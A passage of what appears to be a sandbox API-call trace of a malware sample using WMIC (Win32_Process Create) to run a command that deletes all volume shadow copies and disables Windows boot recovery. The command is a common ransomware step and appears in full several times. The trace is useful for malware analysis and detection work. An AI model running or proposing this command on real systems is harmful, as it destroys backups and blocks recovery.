pVal=0xcf338*(varType=0x0, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0 | out: pVal=0xcf338*(varType=0x1, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] ??0CHString@@QAE@XZ () returned 0xcf258 [0172.737] IWbemClassObject:Get (in: This=0x75d268, wszName="Qualifiers", lFlags=0, pVal=0xcf1dc*(varType=0x0, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x75cdd6, varVal2=0xcf23c), pType=0x0, plFlavor=0x0 | out: 
pVal=0xcf1dc*(varType=0x200d, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x236ad8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2506e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf23c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] SafeArrayGetLBound (in: psa=0x236ad8, nDim=0x1, plLbound=0xcf218 | out: plLbound=0xcf218) returned 0x0 [0172.737] SafeArrayGetUBound (in: psa=0x236ad8, nDim=0x1, plUbound=0xcf204 | out: plUbound=0xcf204) returned 0x0 [0172.737] SafeArrayGetElement (in: psa=0x236ad8, rgIndices=0xcf240, pv=0xcf250 | out: pv=0xcf250) returned 0x0 [0172.737] IWbemClassObject:Get (in: This=0x75d520, wszName="Name", lFlags=0, pVal=0xcf1ec*(varType=0x0, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1=0x877e52, varVal2=0x1), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1ec*(varType=0x8, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1="Out", varVal2=0x1), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] IWbemClassObject:Get (in: This=0x75d520, wszName="QualifierValue", lFlags=0, pVal=0xcf1cc*(varType=0x0, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x75cdd6, varVal2=0xcf1f0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1cc*(varType=0x2008, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x236b08*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x250810, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf1f0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] SafeArrayGetLBound (in: psa=0x236b08, nDim=0x1, plLbound=0xcf220 | out: plLbound=0xcf220) returned 0x0 [0172.737] SafeArrayGetUBound (in: psa=0x236b08, nDim=0x1, plUbound=0xcf210 | out: plUbound=0xcf210) returned 0x0 [0172.737] lstrlenW (lpString="CIMTYPE") returned 7 [0172.737] lstrlenW (lpString="Out") returned 3 [0172.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="CIMTYPE", cchCount2=7) returned 3 [0172.737] lstrlenW (lpString="read") returned 4 [0172.737] 
lstrlenW (lpString="Out") returned 3 [0172.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="read", cchCount2=4) returned 1 [0172.737] lstrlenW (lpString="write") returned 5 [0172.737] lstrlenW (lpString="Out") returned 3 [0172.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="write", cchCount2=5) returned 1 [0172.737] lstrlenW (lpString="In") returned 2 [0172.737] lstrlenW (lpString="Out") returned 3 [0172.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="In", cchCount2=2) returned 3 [0172.737] lstrlenW (lpString="Out") returned 3 [0172.738] lstrlenW (lpString="Out") returned 3 [0172.738] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="Out", cchCount2=3) returned 2 [0172.738] SafeArrayGetElement (in: psa=0x236b08, rgIndices=0xcf244, pv=0xcf278 | out: pv=0xcf278) returned 0x0 [0172.738] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0172.738] IUnknown:Release (This=0x75d520) returned 0x1 [0172.738] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.738] SysStringLen (param_1="ProcessId") returned 0x9 [0172.738] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.738] SysStringLen (param_1="ProcessId") returned 0x9 [0172.738] SysStringLen (param_1="ProcessStartupInformation") returned 0x19 [0172.738] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.738] SysStringLen (param_1="ProcessId") returned 0x9 [0172.738] IUnknown:Release (This=0x75d268) returned 0x1 [0172.738] IUnknown:Release (This=0x752e50) returned 0x1 [0172.738] IUnknown:Release (This=0x74fff8) returned 0x0 [0172.739] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.739] lstrlenW (lpString="Create") returned 6 [0172.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="cmd.exe /c vssadmin.exe delete shadows /all /quiet 
& bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", cchCount1=162, lpString2="/", cchCount2=1) returned 3 [0172.739] lstrlenW (lpString="-") returned 1 [0172.739] lstrlenW (lpString="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures") returned 162 [0172.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", cchCount1=162, lpString2="-", cchCount2=1) returned 3 [0172.739] lstrlenW (lpString="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures") returned 162 [0172.739] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0x94f97298*=0x0 | out: _String="Select", _Context=0x94f97298*=0x0) returned="Select" [0172.739] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97298*=0x0 | out: _String=0x0, _Context=0x94f97298*=0x0) returned="*" [0172.739] lstrlenW (lpString="FROM") returned 4 [0172.739] lstrlenW (lpString="*") returned 1 [0172.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0172.739] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97298*=0x0 | out: _String=0x0, _Context=0x94f97298*=0x0) returned="from" [0172.739] lstrlenW (lpString="FROM") returned 4 [0172.739] lstrlenW (lpString="from") returned 4 [0172.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0172.739] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97298*=0x0 | out: _String=0x0, _Context=0x94f97298*=0x0) returned="Win32_Process" [0172.740] lstrlenW 
(lpString="SET") returned 3 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0172.740] lstrlenW (lpString="CREATE") returned 6 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0172.740] lstrlenW (lpString="LIST") returned 4 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0172.740] lstrlenW (lpString="ASSOC") returned 5 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0172.740] WbemLocator:IUnknown:AddRef (This=0x720828) returned 0x3 [0172.740] lstrlenW (lpString="") returned 0 [0172.740] lstrlenW (lpString="CRH2YWU7") returned 8 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="", cchCount2=0) returned 3 [0172.740] lstrlenW (lpString="CRH2YWU7") returned 8 [0172.740] GetCurrentProcess () returned 0xffffffff [0172.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xcfce8 | out: TokenHandle=0xcfce8*=0x280) returned 1 [0172.740] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcfce4 | out: TokenInformation=0x0, ReturnLength=0xcfce4) returned 0 [0172.740] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x762ea8, TokenInformationLength=0x118, ReturnLength=0xcfce4 | out: 
TokenInformation=0x762ea8, ReturnLength=0xcfce4) returned 1 [0172.740] AdjustTokenPrivileges (in: TokenHandle=0x280, DisableAllPrivileges=0, NewState=0x762ea8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0172.740] CloseHandle (hObject=0x280) returned 1 [0172.740] lstrlenW (lpString="GET") returned 3 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0172.740] lstrlenW (lpString="LIST") returned 4 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", 
cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0172.740] lstrlenW (lpString="SET") returned 3 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0172.740] lstrlenW (lpString="CALL") returned 4 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0172.741] ??0CHString@@QAE@XZ () returned 0xcfcac [0172.741] GetCurrentThreadId () returned 0xf7c [0172.741] SysStringLen (param_1="\\\\") returned 0x2 [0172.741] SysStringLen (param_1="CRH2YWU7") returned 0x8 [0172.741] SysStringLen (param_1="\\\\CRH2YWU7") returned 0xa [0172.741] SysStringLen (param_1="\\") returned 0x1 [0172.741] SysStringLen (param_1="\\\\CRH2YWU7\\") returned 0xb [0172.741] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0172.742] WbemLocator:IWbemLocator:ConnectServer (in: This=0x720828, strNetworkResource="\\\\CRH2YWU7\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8bc204 | out: ppNamespace=0x8bc204*=0x72d024) returned 0x0 [0172.812] CoSetProxyBlanket (pProxy=0x72d024, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0172.812] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.869] ??0CHString@@QAE@XZ () returned 0xcfca8 [0172.869] GetCurrentThreadId () returned 0xf7c [0172.869] lstrlenA (lpString="") returned 0 [0172.870] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0x94f975e4*=0x0 | out: _String="Select", _Context=0x94f975e4*=0x0) returned="Select" [0172.870] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f975e4*=0x0 | out: _String=0x0, _Context=0x94f975e4*=0x0) returned="*" [0172.870] lstrlenW (lpString="FROM") returned 4 
[0172.870] lstrlenW (lpString="*") returned 1 [0172.870] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0172.870] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f975e4*=0x0 | out: _String=0x0, _Context=0x94f975e4*=0x0) returned="from" [0172.870] lstrlenW (lpString="FROM") returned 4 [0172.870] lstrlenW (lpString="from") returned 4 [0172.870] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0172.870] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f975e4*=0x0 | out: _String=0x0, _Context=0x94f975e4*=0x0) returned="Win32_Process" [0172.870] IWbemServices:GetObject (in: This=0x72d024, strObjectPath="Win32_Process", lFlags=131072, pCtx=0x0, ppObject=0xcfc84*=0x0, ppCallResult=0x0 | out: ppObject=0xcfc84*=0x73f128, ppCallResult=0x0) returned 0x0 [0173.620] IWbemClassObject:GetMethod (in: This=0x73f128, wszName="Create", lFlags=0, ppInSignature=0xcfc9c, ppOutSignature=0xcfc7c | out: ppInSignature=0xcfc9c*=0x740740, ppOutSignature=0xcfc7c*=0x740eb8) returned 0x0 [0173.620] IWbemClassObject:SpawnInstance (in: This=0x740740, lFlags=0, ppNewInstance=0xcfc94 | out: ppNewInstance=0xcfc94*=0x7410b0) returned 0x0 [0173.621] IWbemClassObject:GetNames (in: This=0x740740, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0xcfca4 | out: pNames=0xcfca4*="\x01ƀ\x04") returned 0x0 [0173.621] SafeArrayGetLBound (in: psa=0x236aa8, nDim=0x1, plLbound=0xcfc64 | out: plLbound=0xcfc64) returned 0x0 [0173.621] SafeArrayGetUBound (in: psa=0x236aa8, nDim=0x1, plUbound=0xcfc68 | out: plUbound=0xcfc68) returned 0x0 [0173.621] SafeArrayGetElement (in: psa=0x236aa8, rgIndices=0xcfc88, pv=0xcfcac | out: pv=0xcfcac) returned 0x0 [0173.621] IWbemClassObject:GetPropertyQualifierSet (in: This=0x7410b0, wszProperty="CommandLine", ppQualSet=0xcfb78 | out: ppQualSet=0xcfb78*=0x720868) returned 0x0 [0173.621] IWbemQualifierSet:Get (in: 
This=0x720868, wszName="CIMTYPE", lFlags=0, pVal=0xcfb1c*(varType=0x0, wReserved1=0x0, wReserved2=0x7e80, wReserved3=0x87, varVal1=0x94f97530, varVal2=0x8730b0), plFlavor=0x0 | out: pVal=0xcfb1c*(varType=0x8, wReserved1=0x0, wReserved2=0x7e80, wReserved3=0x87, varVal1="string", varVal2=0x8730b0), plFlavor=0x0) returned 0x0 [0173.621] IWbemClassObject:Get (in: This=0x7410b0, wszName="CommandLine", lFlags=0, pVal=0xcfaf8*(varType=0x0, wReserved1=0xc9eb, wReserved2=0xfb14, wReserved3=0xc, varVal1=0x877764, varVal2=0x24), pType=0xcfb2c*=850896, plFlavor=0x0 | out: pVal=0xcfaf8*(varType=0x1, wReserved1=0xc9eb, wReserved2=0xfb14, wReserved3=0xc, varVal1=0x877764, varVal2=0x24), pType=0xcfb2c*=8, plFlavor=0x0) returned 0x0 [0173.621] IWbemQualifierSet:Get (in: This=0x720868, wszName="read", lFlags=0, pVal=0xcfb30*(varType=0x0, wReserved1=0x0, wReserved2=0x3510, wReserved3=0x76, varVal1=0xcfb24, varVal2=0xcfb6c), plFlavor=0x0 | out: pVal=0xcfb30*(varType=0x0, wReserved1=0x0, wReserved2=0x3510, wReserved3=0x76, varVal1=0xcfb24, varVal2=0xcfb6c), plFlavor=0x0) returned 0x80041002 [0173.622] IWbemQualifierSet:Get (in: This=0x720868, wszName="write", lFlags=0, pVal=0xcfb30*(varType=0x0, wReserved1=0x0, wReserved2=0x3510, wReserved3=0x76, varVal1=0xcfb24, varVal2=0xcfb6c), plFlavor=0x0 | out: pVal=0xcfb30*(varType=0x0, wReserved1=0x0, wReserved2=0x3510, wReserved3=0x76, varVal1=0xcfb24, varVal2=0xcfb6c), plFlavor=0x0) returned 0x80041002 [0173.622] IWbemQualifierSet:Get (in: This=0x720868, wszName="Description", lFlags=0, pVal=0xcfb0c*(varType=0x0, wReserved1=0x0, wReserved2=0x20, wReserved3=0x0, varVal1=0xcfb48, varVal2=0x877e52), plFlavor=0x0 | out: pVal=0xcfb0c*(varType=0x0, wReserved1=0x0, wReserved2=0x20, wReserved3=0x0, varVal1=0xcfb48, varVal2=0x877e52), plFlavor=0x0) returned 0x80041002 [0173.622] lstrlenA (lpString="Not Available") returned 13 [0173.622] IUnknown:Release (This=0x720868) returned 0x0 [0173.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, 
lpString1="CommandLine", cchCount1=11, lpString2="CommandLine", cchCount2=11) returned 2 [0173.622] SysStringLen (param_1="In") returned 0x2 [0173.622] SysStringLen (param_1="MaxLen") returned 0x6 [0173.622] lstrlenW (lpString="") returned 0 [0173.622] lstrlenW (lpString="STRING") returned 6 [0173.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0173.622] lstrlenW (lpString="string") returned 6 [0173.622] lstrlenW (lpString="STRING") returned 6 [0173.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0173.623] SysStringLen (param_1="In") returned 0x2 [0173.623] SysStringLen (param_1="ValueMap") returned 0x8 [0173.623] SysStringLen (param_1="In") returned 0x2 [0173.623] SysStringLen (param_1="Values") returned 0x6 [0173.623] IWbemClassObject:GetPropertyQualifierSet (in: This=0x7410b0, wszProperty="CommandLine", ppQualSet=0xcfb84 | out: ppQualSet=0xcfb84*=0x720868) returned 0x0 [0173.623] IWbemQualifierSet:Get (in: This=0x720868, wszName="CIMTYPE", lFlags=0, pVal=0xcfb6c*(varType=0x0, wReserved1=0x0, wReserved2=0x75fc, wReserved3=0x94f9, varVal1=0xcf8f8, varVal2=0xcfcb8), plFlavor=0x0 | out: pVal=0xcfb6c*(varType=0x8, wReserved1=0x0, wReserved2=0x75fc, wReserved3=0x94f9, varVal1="string", varVal2=0xcfcb8), plFlavor=0x0) returned 0x0 [0173.623] IWbemClassObject:Get (in: This=0x7410b0, wszName="CommandLine", lFlags=0, pVal=0xcfb5c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xcfb7c*=9111328, plFlavor=0x0 | out: pVal=0xcfb5c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xcfb7c*=8, plFlavor=0x0) returned 0x0 [0173.623] IUnknown:Release (This=0x720868) returned 0x0 [0173.623] lstrlenW (lpString="string") returned 6 [0173.623] lstrlenW (lpString="string") returned 6 [0173.623] CompareStringW (Locale=0x800, 
dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0173.623] IWbemClassObject:Put (This=0x7410b0, wszName="CommandLine", lFlags=0, pVal=0xcfc38*(varType=0x8, wReserved1=0x25, wReserved2=0x6, wReserved3=0x0, varVal1="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", varVal2=0x6), Type=0) returned 0x0 [0173.624] IUnknown:Release (This=0x740740) returned 0x0 [0173.624] IUnknown:Release (This=0x740eb8) returned 0x0 [0173.624] IUnknown:Release (This=0x73f128) returned 0x0 [0173.624] ??0CHString@@QAE@XZ () returned 0xcfb74 [0173.624] GetCurrentThreadId () returned 0xf7c [0173.624] lstrlenA (lpString="") returned 0 [0173.624] lstrlenA (lpString="") returned 0 [0173.624] lstrlenW (lpString="Select * from Win32_Process") returned 27 [0173.624] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0x94f97568*=0x0 | out: _String="Select", _Context=0x94f97568*=0x0) returned="Select" [0173.624] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97568*=0x0 | out: _String=0x0, _Context=0x94f97568*=0x0) returned="*" [0173.624] lstrlenW (lpString="FROM") returned 4 [0173.624] lstrlenW (lpString="*") returned 1 [0173.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0173.624] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97568*=0x0 | out: _String=0x0, _Context=0x94f97568*=0x0) returned="from" [0173.625] lstrlenW (lpString="FROM") returned 4 [0173.625] lstrlenW (lpString="from") returned 4 [0173.625] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0173.625] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97568*=0x0 | out: _String=0x0, _Context=0x94f97568*=0x0) returned="Win32_Process" [0173.625] ??0CHString@@QAE@XZ () returned 0xcf2d8 
[0173.625] GetCurrentThreadId () returned 0xf7c [0173.625] LoadStringW (in: hInstance=0x0, uID=0xb7ea, lpBuffer=0xcea84, cchBufferMax=1024 | out: lpBuffer="Executing (%1)->%2()\r\n") returned 0x16 [0173.625] FormatMessageW (in: dwFlags=0x2500, lpSource=0xcea84, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0xcea80, nSize=0x0, Arguments=0xcea6c | out: lpBuffer="\xf1a0\x25\x45\x78\x65\x63\x75\x74\x69\x6e\x67\x20\x28\x25\x31\x29\x2d\x3e\x25\x32\x28\x29\x0d\x0a") returned 0x25 [0173.625] LocalFree (hMem=0x25f1a0) returned 0x0 [0173.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (Win32_Process)->Create()\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0173.625] ??YCHString@@QAEABV0@PBG@Z () returned 0x8bc28c [0173.625] fprintf (in: _File=0x76b32920, _Format="%s" | out: _File=0x76b32920) returned 37 [0173.626] fflush (in: _File=0x76b32920 | out: _File=0x76b32920) returned 0 [0173.626] IWbemServices:ExecMethod (in: This=0x72d024, strObjectPath="Win32_Process", strMethodName="Create", lFlags=0, pCtx=0x0, pInParams=0x7410b0, ppOutParams=0xcf2f0*=0x0, ppCallResult=0x0 | out: ppOutParams=0xcf2f0*=0x72d478, ppCallResult=0x0) returned 0x0 [0177.829] LoadStringW (in: hInstance=0x0, uID=0xb3b3, lpBuffer=0x765bf0, cchBufferMax=1024 | out: lpBuffer="Method execution successful.\r\n") returned 0x1e [0177.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0177.829] ??YCHString@@QAEABV0@PBG@Z () returned 0x8bc28c [0177.829] fprintf (in: _File=0x76b32920, _Format="%s" | out: _File=0x76b32920) returned 30 [0177.829] fflush (in: _File=0x76b32920 | out: _File=0x76b32920) returned 0 [0177.829] IUnknown:AddRef (This=0x72d478) returned 0x2 
[0177.830] ??0CHString@@QAE@XZ () returned 0xcf280 [0177.830] GetCurrentThreadId () returned 0xf7c [0177.885] IWbemClassObject:GetObjectText (in: This=0x72d478, lFlags=0, pstrObjectText=0xcf284 | out: pstrObjectText=0xcf284*="\ninstance of __PARAMETERS\n{\n\x09ProcessId = 2920;\n\x09ReturnValue = 0;\n};\n") returned 0x0 [0177.895] LoadStringW (in: hInstance=0x0, uID=0xb7f7, lpBuffer=0x765bf0, cchBufferMax=1024 | out: lpBuffer="Out Parameters:") returned 0xf [0177.895] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.895] ??YCHString@@QAEABV0@PBG@Z () returned 0x8bc28c [0177.895] fprintf (in: _File=0x76b32920, _Format="%s" | out: _File=0x76b32920) returned 15 [0177.895] fflush (in: _File=0x76b32920 | out: _File=0x76b32920) returned 0 [0177.895] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ProcessId = 2920;\n\x09ReturnValue = 0;\n};\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0177.895] ??YCHString@@QAEABV0@PBG@Z () returned 0x8bc28c [0177.895] fprintf (in: _File=0x76b32920, _Format="%s" | out: _File=0x76b32920) returned 68 [0177.896] fflush (in: _File=0x76b32920 | out: _File=0x76b32920) returned 0 [0177.896] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0177.896] ??YCHString@@QAEABV0@PBG@Z () returned 0x8bc28c [0177.896] fprintf (in: _File=0x76b32940, _Format="%s" | out: _File=0x76b32940) returned 1 [0177.897] fflush (in: _File=0x76b32940 | out: _File=0x76b32940) returned 0 [0177.897] ??1CHString@@QAE@XZ () returned 0x6f950504 
[0177.897] IUnknown:Release (This=0x72d478) returned 0x1 [0177.897] ??1CHString@@QAE@XZ () returned 0x6f950504 [0177.897] ??1CHString@@QAE@XZ () returned 0x6f950504 [0177.897] ??1CHString@@QAE@XZ () returned 0x6f950504 [0177.897] GetCurrentThreadId () returned 0xf7c [0177.897] ??0CHString@@QAE@PBG@Z () returned 0xcfd1c [0177.897] ??YCHString@@QAEABV0@PBG@Z () returned 0xcfd1c [0177.897] lstrlenW (lpString="LIST") returned 4 [0177.897] lstrlenW (lpString="call") returned 4 [0177.897] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0177.897] lstrlenW (lpString="ASSOC") returned 5 [0177.897] lstrlenW (lpString="call") returned 4 [0177.897] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0177.897] lstrlenW (lpString="GET") returned 3 [0177.897] lstrlenW (lpString="call") returned 4 [0177.897] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0177.897] ??1CHString@@QAE@XZ () returned 0x1 [0177.897] WbemLocator:IUnknown:Release (This=0x72d024) returned 0x0 [0177.931] ?Empty@CHString@@QAEXXZ () returned 0x6f950510 [0177.974] _kbhit () returned 0x0 [0178.105] IUnknown:Release (This=0x72d478) returned 0x0 [0178.105] ?Empty@CHString@@QAEXXZ () returned 0x6f950504 [0178.106] WbemLocator:IUnknown:Release (This=0x720828) returned 0x2 [0178.106] WbemLocator:IUnknown:Release (This=0x72c7cc) returned 0x0 [0178.230] WbemLocator:IUnknown:Release (This=0x72c74c) returned 0x0 [0178.230] WbemLocator:IUnknown:Release (This=0x720828) returned 0x1 [0178.230] ?Empty@CHString@@QAEXXZ () returned 0x6f950504 [0178.230] WbemLocator:IUnknown:Release 